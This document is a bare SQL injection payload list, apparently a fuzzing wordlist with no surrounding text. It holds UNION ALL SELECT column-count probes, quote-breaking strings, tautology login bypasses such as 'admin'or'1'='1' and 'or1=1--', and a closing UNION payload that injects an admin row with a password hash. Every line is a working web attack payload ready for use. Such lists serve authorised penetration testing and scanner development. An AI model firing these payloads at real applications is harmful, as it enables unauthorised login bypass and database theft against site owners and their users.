UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
'-'
''
'&'
'^'
'*'
'or''-'
'or'''
'or''&'
'or''^'
'or''*'
"-"
""
"&"
"^"
"*"
"or""-"
"or"""
"or""&"
"or""^"
"or""*"
ortrue--
"ortrue--
'ortrue--
")ortrue--
')ortrue--
'or'x'='x
')or('x')=('x
'))or(('x'))=(('x
"or"x"="x
")or("x")=("x
"))or(("x"))=(("x
or1=1
or1=1--
or1=1#
or1=1/*
admin'--
admin'#
admin'/*
admin'or'1'='1
admin'or'1'='1'--
admin'or'1'='1'#
admin'or'1'='1'/*
admin'or1=1or''='
admin'or1=1
admin'or1=1--
admin'or1=1#
admin'or1=1/*
admin')or('1'='1
admin')or('1'='1'--
admin')or('1'='1'#
admin')or('1'='1'/*
admin')or'1'='1
admin')or'1'='1'--
admin')or'1'='1'#
admin')or'1'='1'/*
1234'AND1=0UNIONALLSELECT'admin','81dc9bdb52d04dc20036dbd8313ed055
